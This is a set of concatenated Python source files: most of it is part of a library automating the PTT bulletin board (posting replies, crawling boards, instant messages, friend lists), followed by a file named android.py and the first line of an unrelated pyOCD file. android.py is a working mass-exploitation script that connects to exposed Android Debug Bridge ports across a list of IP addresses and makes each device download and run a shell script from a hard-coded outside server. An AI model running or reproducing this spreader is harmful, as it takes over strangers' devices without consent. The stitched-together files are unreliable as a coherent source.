elif ReplyType == ReplyPostType.Mail:
ReplyResponse = 'M'
elif ReplyType == ReplyPostType.Board_Mail:
ReplyResponse = 'B'
else:
self.Log('回文種類輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
if PostID == '' and Index == -1:
self.Log('輸入參數錯誤')
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
self.__APILock[ConnectIndex].acquire()
Board = str(Board)
Content = str(Content)
PostID = str(PostID)
Index = int(Index)
        # Move to the main menu
SendMessage = GotoMainMenuCommand + 'qs' + Board + '\r\x03\x03 '
        # Move to the post
if PostID != '':
SendMessage += '#' + PostID + '\r\rr'
elif Index != -1:
SendMessage += str(Index) + '\r\rr'
SendMessage += ReplyResponse + '\r'
SendMessage += 'y\ry\r'
Refresh = True
isBreakDetect = False
        # List order determines detection priority
DetectTargetList = [
DetectUnit(
'編輯文章',
'編輯文章',
ResponseUnit(Content + '\r\x18s\r', True),
#
),
DetectUnit(
'不加簽名檔',
'x=隨機',
ResponseUnit('0\r', False),
),
DetectUnit(
'送出回文',
'請按任意鍵繼續',
ResponseUnit(GotoMainMenuCommand, False),
),
DetectUnit(
'自存底稿',
'是否自存底稿',
ResponseUnit('y\r', False),
),
DetectUnit(
'',
'我是' + self.__ID,
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('操作超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
                self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg())
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
self.__isConnected[ConnectIndex] = True
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
self.__APILock[ConnectIndex].release()
self.__WaterBallProceeor()
self.__ErrorCode = ErrCode
return ErrCode
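    # Worker used by crawlBoard(): each connection crawls its assigned index range and passes every
    # successfully fetched post to PostHandler under a shared lock.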
def __crawlBoardThread(self, ConnectIndex, Board, PostHandler, StartIndex, EndIndex, SearchType, Search):
self.Log('連線頻道 ' + str(ConnectIndex) + ' ' + Board + ' 爬行 ' + str(StartIndex) + ' ' + str(EndIndex))
if not self.__isConnected[ConnectIndex] and ConnectIndex > 0:
# self.__CrawLock.acquire()
self.__connectRemote(ConnectIndex)
self.__EnableLoginCount += 1
# self.__CrawLock.release()
while self.__EnableLoginCount < self.__EnableLogin:
time.sleep(1)
for PostIndex in range(StartIndex, EndIndex):
self.__IdleTime = 0
ErrCode, Post = self.getPost(Board, PostIndex=PostIndex, _ConnectIndex=ConnectIndex, SearchType=SearchType, Search=Search)
if not self.__isBackground:
self.__ProgressBarCount += 1
self.__ProgressBar.update(self.__ProgressBarCount)
if ErrCode == ErrorCode.PostDeleted:
self.__DeleteCrawCount += 1
elif ErrCode != ErrorCode.Success:
self.__ErrorGetPostList.append([ErrCode, Board, PostIndex])
continue
self.__SuccessCrawCount += 1
self.__CrawLock.acquire()
# self.Log(Post.getTitle())
try:
PostHandler(Post)
except TypeError:
self.Log('PostHandler 介面錯誤', LogLevel.WARNING)
except:
self.Log('PostHandler 未知錯誤', LogLevel.WARNING)
self.__CrawLock.release()
self.Log('頻道 ' + str(ConnectIndex) + ' 爬行完畢', LogLevel.DEBUG)
return
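    # Crawls posts StartIndex..EndIndex of Board and calls PostHandler(post) for each fetched post.
    # With MaxMultiLogin > 0 the range is split across extra logins, one crawler thread per connection.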
def crawlBoard(self, Board, PostHandler, MaxMultiLogin=0, StartIndex=0, EndIndex=0, SearchType=0, Search='', MaxThreadPost=100):
ErrCode = ErrorCode.Success
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode, 0, 0
try:
Board = str(Board)
StartIndex = int(StartIndex)
EndIndex = int(EndIndex)
MaxMultiLogin = int(MaxMultiLogin)
Search = str(Search)
MaxThreadPost = int(MaxThreadPost)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, 0, 0
if MaxMultiLogin < 0 or 5 < MaxMultiLogin:
self.Log('多重登入設定錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, 0, 0
if MaxThreadPost < 1:
self.Log('每個線程負責文章數設定錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, 0, 0
self.__MaxMultiLogin = MaxMultiLogin
ErrCode, NewestIndex = self.getNewestIndex(Board=Board, SearchType=SearchType, Search=Search)
if ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode, 0, 0
if StartIndex == 0 and EndIndex == 0:
StartIndex = 1
EndIndex = NewestIndex
elif StartIndex < 1 or NewestIndex < StartIndex:
self.Log('文章編號區間輸入錯誤: 開始標記不在 ' + Board + ' 板範圍中', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, 0, 0
elif EndIndex < 1 or NewestIndex < EndIndex:
self.Log('文章編號區間輸入錯誤: 結束標記不在 ' + Board + ' 板範圍中', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, 0, 0
elif EndIndex < StartIndex:
self.Log('文章編號區間輸入錯誤: 開始標記比結束標記大', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, 0, 0
self.__CrawLock = threading.Lock()
self.__TotalPost = EndIndex - StartIndex + 1
self.__EnableLogin = 1
self.__SuccessCrawCount = 0
self.__DeleteCrawCount = 0
self.__ErrorGetPostList = []
if not self.__isBackground:
self.__ProgressBar = progressbar.ProgressBar(max_value=self.__TotalPost)
self.__ProgressBarCount = 0
self.Log('總爬行文章: ' + str(self.__TotalPost) + ' 篇')
if self.__MaxMultiLogin > 0:
TempStr = '啟動連線頻道 '
for i in range(self.__MaxMultiLogin):
if (i + 1) * MaxThreadPost <= self.__TotalPost:
self.__EnableLogin += 1
TempStr += str(i) + ' '
self.Log(TempStr)
self.__CrawPoolList = []
CrawThreadList = []
Basic = int(self.__TotalPost / self.__EnableLogin)
LastEndIndexTemp = StartIndex
for i in range(0, self.__EnableLogin):
StartIndexTemp = LastEndIndexTemp
EndIndexTemp = (i + 1) * Basic + StartIndex
if self.__TotalPost % self.__EnableLogin > i:
EndIndexTemp += 1
LastEndIndexTemp = EndIndexTemp
# self.Log(str(StartIndexTemp) + ' ' + str(EndIndexTemp) + ':' + str(EndIndexTemp - StartIndexTemp))
# self.__CrawPoolList.append([StartIndexTemp, EndIndexTemp])
CrawThreadList.append(threading.Thread(target=self.__crawlBoardThread, args=(i, Board, PostHandler, StartIndexTemp, EndIndexTemp, SearchType, Search)))
self.__EnableLoginCount = 1
for SubThread in CrawThreadList:
SubThread.start()
for SubThread in CrawThreadList:
SubThread.join()
if not self.__isBackground:
self.__ProgressBar.update(self.__TotalPost)
self.__ProgressBar.finish()
for ErrorEvent in self.__ErrorGetPostList:
self.Log('-----------------', LogLevel.DEBUG)
self.Log(ErrorEvent[0], LogLevel.DEBUG)
self.Log(ErrorEvent[1], LogLevel.DEBUG)
self.Log(ErrorEvent[2], LogLevel.DEBUG)
if len(self.__ErrorGetPostList) != 0:
self.Log('-----------------', LogLevel.DEBUG)
self.__WaterBallProceeor()
self.__ErrorCode = ErrCode
return ErrCode, self.__SuccessCrawCount, self.__DeleteCrawCount
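    # Sends a water ball (instant message) to WaterBallTarget; fails if the target is not online.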
def throwWaterBall(self, WaterBallTarget, WaterBallContent):
self.__IdleTime = 0
ConnectIndex = 0
ErrCode = ErrorCode.Success
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode
try:
WaterBallTarget = str(WaterBallTarget)
WaterBallContent = str(WaterBallContent)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
ErrCode, User = self.getUser(WaterBallTarget)
if ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode
# print(WaterBallTarget + ': ' + User.getState())
if '不在站上' in User.getState():
ErrCode = ErrorCode.UserNotOnline
self.__ErrorCode = ErrCode
return ErrCode
self.__APILock[ConnectIndex].acquire()
        # Move to the main menu
SendMessage = GotoMainMenuCommand
SendMessage += 'T\rU\rs' + WaterBallTarget + '\rw'
Refresh = True
isBreakDetect = False
        # List order determines detection priority
DetectTargetList = [
DetectUnit(
'打開呼叫器',
'您的呼叫器目前設定為關閉',
ResponseUnit('y', True),
),
DetectUnit(
'丟 ' + WaterBallTarget + ' 水球',
'丟 ' + WaterBallTarget + ' 水球',
ResponseUnit(WaterBallContent + '\r\r', True),
),
DetectUnit(
'',
'',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
while not isBreakDetect:
# self.Log('SendMessage: \n' + SendMessage )
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('操作超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
                self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg())
isDetectedTarget = True
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
self.__APILock[ConnectIndex].release()
self.__WaterBallProceeor()
self.__ErrorCode = ErrCode
return ErrCode
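    # Deletes one of your own posts on Board, located by PostID or PostIndex; only posts authored
    # by the logged-in ID can be deleted.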
def delPost(self, Board, PostID='', PostIndex=0):
self.__IdleTime = 0
ConnectIndex = 0
ErrCode = ErrorCode.Success
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode
try:
Board = str(Board)
PostID = str(PostID)
PostIndex = int(PostIndex)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
if len(Board) == 0:
self.Log('看板名稱輸入錯誤: ' + str(Board))
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
if PostIndex != 0 and PostID != '':
self.Log('文章編號與代碼輸入錯誤: 同時輸入')
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
if PostIndex == 0 and PostID == '':
self.Log('文章編號與代碼輸入錯誤: 皆無輸入')
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
if PostID != '':
ErrCode, Post = self.getPost(Board, PostID=PostID)
if PostIndex != 0:
ErrCode, Post = self.getPost(Board, PostIndex=PostIndex)
if ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode
if not Post.getAuthor().startswith(self.__ID):
ErrCode = ErrorCode.NoPermission
self.__ErrorCode = ErrCode
return ErrCode
self.__APILock[ConnectIndex].acquire()
SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fDqs' + Board + '\r\x03\x03 '
        # Move to the post
if PostID != '':
SendMessage += '#' + PostID + '\rd'
        elif PostIndex != 0:
SendMessage += str(PostIndex) + '\rd'
Refresh = False
isBreakDetect = False
        # List order determines detection priority
DetectTargetList = [
DetectUnit(
'確定刪除文章',
'請確定刪除(Y/N)?',
ResponseUnit('y\r', False),
),
DetectUnit(
'正在刪除文章',
'請按任意鍵繼續',
ResponseUnit(' ', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'',
'',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('操作超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
                self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
isDetectedTarget = True
self.Log(DetectTarget.getDisplayMsg())
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
self.__WaterBallProceeor()
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
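    # Adds to, deletes from, or queries one of the user lists: good friend, bad guy, login
    # notification, or a numbered special list selected by SpecialListIndex.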
def operateFriendList(self, inputOperateType, inputFriendListType, SpecialListIndex=-1, ID='' , SpecialListName=''):
self.__IdleTime = 0
ErrCode = ErrorCode.Success
result = None
ConnectIndex = 0
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode
try:
inputOperateType = int(inputOperateType)
inputFriendListType = int(inputFriendListType)
SpecialListIndex = int(SpecialListIndex)
ID = str(ID)
SpecialListName = str(SpecialListName)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if inputFriendListType < FriendListType.MinValue or FriendListType.MaxValue < inputFriendListType:
self.Log('輸入錯誤: FriendListType 錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if inputFriendListType == FriendListType.OtherSpecial:
if SpecialListIndex < 0 or 9 < SpecialListIndex:
self.Log('輸入錯誤: SpecialListIndex 錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if inputOperateType < OperateType.MinValue or OperateType.MaxValue < inputOperateType:
self.Log('輸入錯誤: OperateType 錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if inputOperateType == OperateType.Add or inputOperateType == OperateType.Del:
if ID == '':
self.Log('輸入錯誤: 新增或刪除模式下,需要輸入 ID', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if inputOperateType == OperateType.Add:
ErrCode, User = self.getUser(ID)
if ErrCode == ErrorCode.NoUser:
self.Log('沒有此使用者', LogLevel.WARNING)
self.__ErrorCode = ErrCode
return ErrCode, result
elif ErrCode != ErrorCode.Success:
self.Log('取得使用者資訊錯誤 錯誤碼:' + str(ErrCode))
self.__ErrorCode = ErrCode
return ErrCode, result
self.__APILock[ConnectIndex].acquire()
SendMessage = GotoMainMenuCommand + 'N\r'
        # Move to the selected list menu
if inputFriendListType == FriendListType.GoodFriend:
SendMessage += 'O\r'
elif inputFriendListType == FriendListType.BadGuy:
SendMessage += 'B\r'
elif inputFriendListType == FriendListType.LoginNotification:
SendMessage += 'A\r'
elif inputFriendListType == FriendListType.OtherSpecial:
SendMessage += 'S\r' + str(SpecialListIndex) + '\r'
Refresh = True
isBreakDetect = False
if inputOperateType == OperateType.Add:
DetectTargetList = [
DetectUnit(
'系統正在更新清單...',
'正在更新與同步線上使用者及好友名單',
ResponseUnit(' ', False),
),
DetectUnit(
'',
'請為此特別名單取一個簡短名稱:' + SpecialListName,
ResponseUnit('\r', False),
),
DetectUnit(
'',
'請為此特別名單取一個簡短名稱',
ResponseUnit(self.__delAllWord + SpecialListName + '\r', False),
),
DetectUnit(
'新增名單',
'(A)增加',
ResponseUnit('A\r' + ID + '\r\r', True),
),
DetectUnit(
'退出名單',
'【名單編輯】',
ResponseUnit('\r', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
elif inputOperateType == OperateType.Del:
DetectTargetList = [
DetectUnit(
'系統正在更新清單...',
'正在更新與同步線上使用者及好友名單',
ResponseUnit(' ', False),
),
DetectUnit(
'',
'請為此特別名單取一個簡短名稱:' + SpecialListName,
ResponseUnit('\r', False),
),
DetectUnit(
'',
'請為此特別名單取一個簡短名稱',
ResponseUnit(self.__delAllWord + SpecialListName + '\r', False),
),
DetectUnit(
'刪除名單',
'(D)刪除',
ResponseUnit('D\r' + ID + '\r\r', True),
),
DetectUnit(
'退出名單',
'【名單編輯】',
ResponseUnit('\r', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
elif inputOperateType == OperateType.Query:
DetectTargetList = [
DetectUnit(
'解析名單',
'名單上限',
ResponseUnit('Q\r', False),
),
DetectUnit(
'退出名單',
'【名單編輯】',
ResponseUnit('\r', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
ListPage = ''
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('操作超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
                self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
isDetectedTarget = True
self.Log(DetectTarget.getDisplayMsg())
if '解析名單' == DetectTarget.getDisplayMsg():
ListPage = self.__ReceiveData[ConnectIndex]
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
if inputOperateType == OperateType.Query:
result = []
List = ListPage.split('\n')[2:]
for Line in List:
if Line.startswith('[K'):
Line = Line[2:]
TempList = Line.split(' ')
TempList = list(filter(None, TempList))
result.extend(TempList)
self.__WaterBallProceeor()
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
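    # Retrieves the water-ball (instant message) history; WaterBallOperateType decides whether the
    # history is then kept, cleared, or mailed back to the account.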
def getHistoricalWaterBall(self, WaterBallOperateType=0):
self.__IdleTime = 0
ErrCode = ErrorCode.Success
result = []
ConnectIndex = 0
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode, result
try:
WaterBallOperateType = int(WaterBallOperateType)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if WaterBallOperateType == 0:
WaterBallOperateType = Information.WaterBallOperateType.DoNothing
elif WaterBallOperateType < Information.WaterBallOperateType.MinValue or Information.WaterBallOperateType.MaxValue < WaterBallOperateType:
self.Log('錯誤的輸入: OperateType 輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
self.__APILock[ConnectIndex].acquire()
SendMessage = GotoMainMenuCommand + 'T\rD\r'
isBreakDetect = False
        # List order determines detection priority
DetectTargetList = [
DetectUnit(
'水球頁面讀取完成',
'(100%) 目前',
ResponseUnit('qC\rY\r', True),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'水球頁面讀取完成',
'頁 (100%)',
ResponseUnit('\x1b\x4fDC\rY\r', True),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'',
'目前顯示: 第',
ResponseUnit('', True),
),
DetectUnit(
'',
'瀏覽 第',
ResponseUnit('', True),
),
DetectUnit(
'無訊息記錄',
'◆ 暫無訊息記錄',
ResponseUnit('y\r', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'',
'按任意鍵繼續',
ResponseUnit(' ', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
NoMsg = False
PageIndex = 2
        # By default drop the first five lines of page one: author, title, date, the separator line and one blank line
LastPageIndex = 0
WaterBallListTemp = []
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=True)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('操作超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
                self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
isDetectedTarget = True
self.Log(DetectTarget.getDisplayMsg())
if '無訊息記錄' in DetectTarget.getDisplayMsg():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
NoMsg = True
break
CurrentPage = self.__ReceiveData[ConnectIndex]
if CurrentPage.startswith('[2J'):
CurrentPage = CurrentPage[3:]
CurrentPageList = CurrentPage.split('\n')
PageLineRangeTemp = CurrentPageList[-1][CurrentPageList[-1].find(' 瀏覽 第'):]
PageLineRange = re.findall(r'\d+', PageLineRangeTemp)
PageLineRange = list(map(int, PageLineRange))[3:]
OverlapLine = LastPageIndex - PageLineRange[0] + 1
if OverlapLine >= 1 and LastPageIndex != 0:
# print('重疊', OverlapLine, '行')
CurrentPageList = CurrentPageList[OverlapLine:]
LastPageIndex = PageLineRange[1]
CurrentPageList[-1] = CurrentPageList[-1][:CurrentPageList[-1].rfind(']') + 1]
WaterBallListTemp.extend(CurrentPageList)
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
SendMessage = str(PageIndex) + '\r'
PageIndex += 1
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name + 'Part 1', ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
if not NoMsg:
for i in range(len(WaterBallListTemp)):
while WaterBallListTemp[i].startswith(' '):
WaterBallListTemp[i] = WaterBallListTemp[i][1:]
for line in WaterBallListTemp:
Type = 0
if line.startswith('To'):
# print('Send water ball: ' + line)
Type = WaterBallType.Send
WaterBallAuthor = line[3 : line.find(':')]
elif line.startswith('★'):
# print('Catch water ball: ' + line)
Type = WaterBallType.Catch
WaterBallAuthor = line[1 : line.find(' ')]
if Type != 0:
WaterBallContent = line[line.find(' ') + 1 : line.rfind('[') - 1]
WaterBallDate = line[line.rfind('[') + 1 : line.rfind(']')]
CurrentWaterBall = Information.WaterBallInformation(Type, WaterBallAuthor, WaterBallContent, WaterBallDate)
result.append(CurrentWaterBall)
isBreakDetect = False
        # List order determines detection priority
if WaterBallOperateType == Information.WaterBallOperateType.Clear:
SendMessage = 'qC\rY\r' + GotoMainMenuCommand
DetectTargetList = [
DetectUnit(
'清除水球歷史紀錄完成',
'我是' + self.__ID,
ResponseUnit(' ', False),
BreakDetect=True,
),
PTTBUGDetectUnit,
]
elif WaterBallOperateType == Information.WaterBallOperateType.Mail:
SendMessage = 'qM\r' + GotoMainMenuCommand
DetectTargetList = [
DetectUnit(
'水球歷史紀錄寄回信箱完成',
'我是' + self.__ID,
ResponseUnit(' ', False),
BreakDetect=True,
),
PTTBUGDetectUnit,
]
else:
SendMessage = 'qR\r' + GotoMainMenuCommand
DetectTargetList = [
DetectUnit(
'保存水球歷史紀錄',
'我是' + self.__ID,
ResponseUnit(' ', False),
BreakDetect=True,
),
PTTBUGDetectUnit,
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=True)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('操作超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
                self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
isDetectedTarget = True
self.Log(DetectTarget.getDisplayMsg())
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
SendMessage = DetectTarget.getResponse().getSendMessage()
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name + 'Part 2', ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
self.__WaterBallProceeor()
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
def register(self, newID):
self.__IdleTime = 0
ErrCode = ErrorCode.Success
ConnectIndex = 0
self.Log('因 PTT 關閉註冊功能 暫時無法提供註冊 API')
return ErrorCode.DeprecatedAPI
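        # NOTE: everything below is currently unreachable because registration is disabled on PTT.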
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode
try:
newID = str(newID)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
self.__APILock[ConnectIndex].acquire()
SendMessage = ''
Refresh = False
isBreakDetect = False
        # List order determines detection priority
DetectTargetList = [
PTTBUGDetectUnit
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('操作超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
                self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
isDetectedTarget = True
self.Log(DetectTarget.getDisplayMsg())
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
def getErrorCode(self):
return self.__ErrorCode
def readPostFile(self, FileName):
self.__IdleTime = 0
return Util.readPostFile(FileName)
def getVersion(self):
self.__IdleTime = 0
return Version
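# A minimal usage sketch, for reference only. The entry-point class name and the login API are
# assumptions (they are defined earlier in this file and may differ from what is shown here):
#
#   import PTT
#   ptt = PTT.Library()                                  # assumed entry-point class
#   ptt.login('your_id', 'your_password')                # assumed login API
#   ErrCode, post = ptt.getPost('Gossiping', PostIndex=1)
#   ErrCode, now = ptt.getTime()
#   ptt.logout()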
if __name__ == '__main__':
print('PTT Library v ' + Version)
print('Developed by PTT CodingMan')
|
android.py
|
import sys
import threading
import requests
import os
import socket
import time
from Queue import *
from threading import Thread
if len(sys.argv) < 3:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [list] [output]")
ips = open(sys.argv[1], "r").readlines()
output = sys.argv[2]
queue = Queue()
queue_count = 0
info = open(str(sys.argv[1]),'a+')
def rtek(ip):
ip = str(ip).rstrip("\n")
try:
adb = socket.socket()
adb.settimeout(5)
adb.connect((ip,5555))
os.system("echo "+ip+" >> "+output+"")
os.system("adb connect "+ip+"")
time.sleep(3);
os.system("adb -s "+ip+":5555 shell \"cd /data/local/tmp; wget http://178.128.244.61/a.sh; chmod 777 a.sh; sh a.sh; rm -rf a.sh\"")
adb.close()
except Exception:
adb.close()
pass
def main():
global queue_count
for line in ips:
line = line.strip("\r")
line = line.strip("\n")
queue_count += 1
sys.stdout.write("\r[%d] Added to queue" % (queue_count))
sys.stdout.flush()
queue.put(line)
sys.stdout.write("\n")
i = 0
while i != queue_count:
i += 1
try:
input = queue.get()
thread = Thread(target=rtek, args=(input,))
thread.start()
time.sleep(0.05)
except KeyboardInterrupt:
os.kill(os.getpid(), 9)
thread.join()
return
if __name__ == "__main__":
main()
|
pyusb_v2_backend.py
|
# pyOCD debugger
